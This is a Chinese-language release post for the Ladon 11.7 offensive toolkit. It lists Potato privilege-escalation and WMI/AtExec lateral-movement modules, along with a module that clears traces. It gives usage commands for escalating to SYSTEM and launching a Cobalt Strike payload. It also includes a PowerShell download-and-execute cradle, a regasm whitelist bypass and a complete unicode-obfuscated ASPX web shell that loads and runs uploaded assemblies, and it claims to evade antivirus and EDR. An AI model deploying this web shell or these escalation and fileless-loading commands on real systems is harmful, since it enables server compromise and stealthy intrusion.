Ladon11.7更新3个横向移动5个Potato提权

ivi

k8gege K8实验室 2023-10-10 21:08 发表于广西

1. Ladon 11.7 20231010
   
2. 解决Cobalt Strike或LadonShell下双引号等问题
   
3. [u]BadPotato    本地提权 支持Base64参数
   
4. [u]EfsPotato    本地提权 支持Base64参数
   
5. [u]GodPotato    本地提权 支持Base64参数
   
6. [u]SweetPotato    本地提权 支持Base64参数
   
7. [u]McpPotato    本地提权 支持Base64参数
   
8. [+]clsLog      新增清理最近访问文件记录
   
9. 
   
10. 9.24
    
11. [u] WmiExec2    横向移动 内网渗透 修复b64cmd参数Bug
    
12. [u] WmiExec      横向移动 内网渗透 修复域用户连接Bug
    
13. [+] AtExec      横向移动 内网渗透 Base64统一为Unicode(如whoami编码 dwBoAG8AYQBtAGkA )
    
14. 
    
15. 9.18
    
16. [u]PostShell      hexupload支持任意文件上传-当前目录

复制代码

Win11 Pro X64提权至System权限

管理员权限下获取SYSTEM权限，执行命令，弹出system权限CMD

1. Ladon RunSystem cmd.exe

复制代码

实战不需要弹窗，直接启动C2即可，如CS生成的M为c:\1.exe

1. Ladon RunSystem c:\1.exe

复制代码

服务权限提升至System权限

WebShell下，往往权限比较低，如IIS权限或服务权限等，Ladon内置以下模块Efspotato、godpotato、badpotato、sweetpotato、iislpe等均可提升至SYSTEM权限。mssqlcmd也内置sweetpotato、badpotato一键提升至SYSTEM权限。

1. Ladon EfsPotato whoami
   
2. Ladon BadPotato whoami
   
3. Ladon SweetPotato whoami
   
4. Ladon GodPotato whoami
   
5. Ladon McpPotato whoami

复制代码

解决CS或其它shell下使用双引号，截断参数的问题

Cmd使用Base64 Unicode编码，注意是unicode，网上很多工具的Base64加密，可能无法使用，因为它们基本都是utf8编码，相关横向移动模块如WmiExec、atexec等或bypassUAC凡是出现b64cmd用法一致

whoami加密后结果

1. Ladon EfsPotato dwBoAG8AYQBtAGkA
   
2. Ladon BadPotato dwBoAG8AYQBtAGkA
   
3. Ladon SweetPotato dwBoAG8AYQBtAGkA
   
4. Ladon GodPotato dwBoAG8AYQBtAGkA
   
5. Ladon McpPotato dwBoAG8AYQBtAGkA

复制代码

CobaltStrike下用法一致，当然也可右键菜单使用，更直观

PowerShell本地用法(ps1需上传，比起exe免杀效果更好)

1. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon McpPotato whoami

复制代码

PowerShell内存加载 无文件落地用法

先使用Ladon web 80开启迷你web服务器

1. powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon McpPotato whoami"
   

复制代码

LadonShell内存加载

在目标服务器植入以下aspx一句话,使用LadonShell连接，接下来就可以像在CS的beacon命令行下内存加载使用Ladon大部分功能了。整个过程渗透工具都不用上传至目标磁盘，目前市面上应该是唯一的。

1. 
   
2. <%@ Page Language="C#" Debug="true" %><%@ Import Namespace="S\u0079st\u0065m.Diag\u006e\u006fs\u0074\u0069cs" %><%@ Import Namespace="Sy\u0073\u0074em.Re\u0066\u006c\u0065ction" %><script runat="server">    protected void Page_Load(object sender, EventArgs e)    {        if (!Page.IsPostBack)        {        string p="tom";            string c = Re\u0071\u0075\u0065st.Co\u006f\u006bies[p] != null ? Server.Html\u0045\u006e\u0063ode(R\u0065\u0071uest.Coo\u006b\u0069\u0065s[p].Value) : null;            string[] g = null;            if (c != null)            {                byte[] b = Convert.FromBase64String(c);                string d = Encoding.UTF8.GetString(b);                g = d.Split(' ');                S\u0079stem.Ref\u006c\u0065\u0063tion.As\u0073\u0065\u006dbly ass\u0065\u006dbly = Sy\u0073\u0074em.Refl\u0065\u0063\u0074ion.As\u0073\u0065\u006dbly.Load(Re\u0071u\u0065st.Bi\u006e\u0061ryRead(Re\u0071\u0075\u0065st.TotalBytes));                Type[] types = ass\u0065\u006dbly.GetTypes();                foreach (Type type in types)                {                    MethodInfo mt = type.Get\u004d\u0065\u0074hod("Main", BindingFlags.Public | BindingFlags.Static);                    if (mt != null)                    {                        Sy\u0073\u0074em.IO.StringWriter sw = new Sy\u0073\u0074em.IO.StringWriter();                        Console.SetOut(sw);                                         mt.In\u0076\u006fke(null, new object[] { g });                                 Console.SetOut(new Sy\u0073\u0074em.IO.StreamWriter(Console.OpenStandardOutput()));                        string o = sw.ToString();                        Response.Write(o);                        break;                    }                }                   }        }    }</script>

复制代码

工具下必须包含Ladon的CS插件目录，特别是以下文件不能缺

PS:  dat文件也可以单独使用，体积非常小，如LadonInfo.dat是信息收集，包含各种协议，所有发包都是正常协议请求，不会被杀软和EDR拦截，系统里记录的也是正常日志，不会触发报警，不会引起怀疑。因为管理员或者是EDR处理可疑行为日志都来不及，更没功夫看正常日志。

Regasm白名单用法

1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Ladon.exe McpPotato whoami

复制代码